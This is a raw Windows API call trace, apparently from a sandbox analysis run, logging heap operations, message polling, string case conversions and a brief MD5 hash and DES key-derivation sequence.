CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0160.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0160.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0160.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0160.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0160.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0160.862] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.862] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0160.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0160.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0160.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0160.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0160.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0160.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0160.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0160.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0160.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0160.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0160.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0160.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0160.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0160.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0160.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0160.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0160.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0160.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0160.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0160.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0160.863] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.863] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.863] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0160.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.864] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0160.864] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0160.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0160.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0160.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0160.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.864] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.864] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0160.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0160.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0160.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0160.865] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.865] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.865] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.865] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.865] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.865] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.865] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.865] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.865] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.865] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0160.865] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.865] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0160.865] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.865] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.866] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.866] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0160.866] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.866] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.866] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.866] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.866] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0160.866] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.866] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.866] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.866] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.866] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.866] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.866] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.866] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.867] CryptHashData (hHash=0xaa55e0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0160.867] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.867] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.867] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.867] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.867] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.867] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.867] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.867] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.867] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0160.867] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.867] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0160.867] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.867] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.867] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.868] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa55e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa56a0) returned 1 [0160.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0160.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0160.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0160.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0160.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0160.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0160.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0160.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0160.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0160.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0160.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0160.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0160.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0160.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0160.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0160.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0160.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0160.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0160.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0160.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0160.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0160.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0160.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0160.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0160.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0160.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0160.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0160.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0160.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0160.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0160.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0160.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0160.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0160.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0160.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0160.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0160.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0160.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0160.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0160.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0160.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0160.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0160.872] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0160.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0160.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0160.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0160.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0160.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0160.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0160.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0160.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0160.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0160.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 